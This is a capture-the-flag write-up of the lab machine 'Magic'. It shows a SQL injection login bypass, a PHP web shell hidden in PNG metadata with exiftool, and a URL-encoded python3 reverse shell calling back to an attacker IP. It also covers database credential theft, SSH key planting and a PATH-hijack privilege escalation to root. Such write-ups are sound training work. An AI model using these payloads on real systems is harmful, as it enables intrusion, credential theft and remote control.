Today we will see how to own Magic machine. Initially when I started the machine I thought it is going to be related to magic numbers in PHP and something related to juggling concept. But no, it was not like that, so let’s see how was it.

ENUMERATE

aggressive scan for versions with default scripts

Port 80 HTTP Enumeration

visiting website

we see a login page

First I thought it was something related to magic numbers and tried to bypass it using same hash method. But that was not the case. So, after a lot of enumeration I found SQL injection worked on Username field

First capture the request on burp

We can see we get 200 OK HTTP response code but Alert for wrong username or password. So we will fuzz with username password field here.

Reference string

admin’# worked for me. Looking at the burp request

We get 302 found and we get successfully logged in using this on login page

Post login we see, an upload option. Trying to upload abcd.php

Shows us an error , which says what type of file format is required.

I captured upload request on burp and tried to make changes like content-type to applications/x-php, or image name to something like abcd.php.png , or content starting with format type bytes like , png or GIF98 etc. But none worked. This was because the first few bytes of image i.e. it’s header was checked to decide whether this was a legitimate or illegitimate image type.

So I decided to embed payload in comments in meta-data of a legitimate image. To do this I used exiftool. ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata. It is platform independent, available as both a Perl library and command-line application. To do this I downloaded exiftool in kali.

Then make changes to an image file using the same. To accomplish this we will do following things.

1) download any png file.

2) use exiftool to add comment to it

3) add data/payload to give reverse shell

#exiftool -Comment=’<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ exploit.png#cp exploit.png exploit.php.png

Now upload this exploit.php.png

Now we need the folder and a path to access our image. To do this we will run a gobuster scan on magic.

We get folder images. But we need something like Upload directory. So re-iterating through images

We get uploads.

So our file is in this path : 10.10.10.185/images/uploads/exploit.php.png

EXPLOITATION

Using pentestmonkey reverse shell cheatsheet, we will use python reverse shell. Also don’t forget to change your IP and listening port and URL encoding it, before sending to URL in cmd parameter. The request looks as follows.

http://10.10.10.185/images/uploads/exploit.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Please see — we are using python3 not python. This was trial and error, didn’t get python working so tried python3.

Keeping netcat on

Getting user

Enumerating through the files. I found database file that is called to authenticate. We see credentials.

Username : theseus | Password : iamkingtheseus. When I tried to switch user , I could not do it with this password. Enumerated a lot, cannot find any different password.

So I decided to connect through mysql, using the above creds.

Mysql wasn’t installed. Mysqldump was which worked for us

We get another password.

Now switching user worked.

Now we are theseus on box.

getting user.txt

PRIVILEGE ESCALATION

Going to location

On checking what do we have inside. We see fdisk command is called.

The fdisk command-line utility provides disk-partitioning functions . We will exploit it.

We will add a reverse shell script to the fdisk command and so instead of listing partitions, fdisk will give us reverse shell on being called via sysinfo as root.

First let’s take ssh based shell of theseus , just for sake of easy editing of files. For this on your machine, generate an RSA keypair.

On target machine, copy your public keys to authorized_keys in theseus ssh directory.

We are actually adding our public key to authorized_keys of theseus. And then use our private key to get ssh into theseus

On your machine

Logic to gain shell as root.

After you get ssh shell. Make a file named fdisk , give it permissions , change PATH variable to pwd(present working directory) and execute sysinfo.

This will give reverse shell, because once sysinfo runs, when it reaches line fdisk -l, it will search for command fdisk and it will find our fdisk, instead of /bin/fdisk due to PATH variable set up by us. And in fdisk we have reverse shell code ready to execute.

To do this, keep netcat listener on , on your machine at the port you like. Then on target machine, make following changes.

Once you see program stops at fdisk location, you will find shell on nc.

ROOTED!!!

OSCP | CEH | Cyber Security Enthusiast.